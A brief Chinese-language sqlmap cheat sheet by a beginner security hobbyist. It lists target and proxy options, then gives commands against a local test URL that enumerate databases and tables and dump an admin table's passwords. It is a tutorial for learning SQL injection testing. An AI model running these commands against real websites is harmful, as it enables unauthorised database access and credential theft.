获取目标
-d DIRECT 直接链接数据库
sqlmap -u --url=URL Target URL (e.g. “http://www.site.com/vuln.php?id=1”)
sqlmap -l 解析日志文件中的目标
sqlmap -x 从远程xml文件解析目标
sqlmap -m 扫描多个目标在同一个文本里面
sqlmap -r 从一个HTTP请求里面解析目标
sqlmap -g 使用谷歌搜索结果作为目标
拓展语句
–cookie=COOKIE 在需要登录的地方,需要登录后的cookie
–proxy="http://127.0.0.1:8087” 使用HTTP代理隐藏自己的身份,比如使用goagent等
–sql-query=QUERY 执行一个sql语句,不一定支持
–batch 默认执行Y,不用手动去选择
执行检测语句
检查注入点 sqlmap -u http://127.0.0.1/star_photo.php?artist_id=11
列数据库信息 sqlmap -u http://127.0.0.1/star_photo.php?artist_id=11 --dbs
指定库名列出所有表 sqlmap -u http://127.0.0.1/star_photo.php?artist_id=11 -Dvhost48330 --tables
指定库名表名列出所有字段 sqlmap -u http://127.0.0.1/star_photo.php?artist_id=11-Dvhost48330 -T admin --columns
指定库名表名字段dump出指定字段 sqlmap -u
http://127.0.0.1/star_photo.php?artist_id=11 -D vhost48330 -Tadmin -C ac,id,password --dump
我是罡罡同学,一位初入网安的小白。☜(ˆ▽ˆ)
(疯狂暗示 点赞 !关注!转发 !!! 点赞 !关注!转发 !!!)
* 您的支持是罡罡同学前进的最大动力!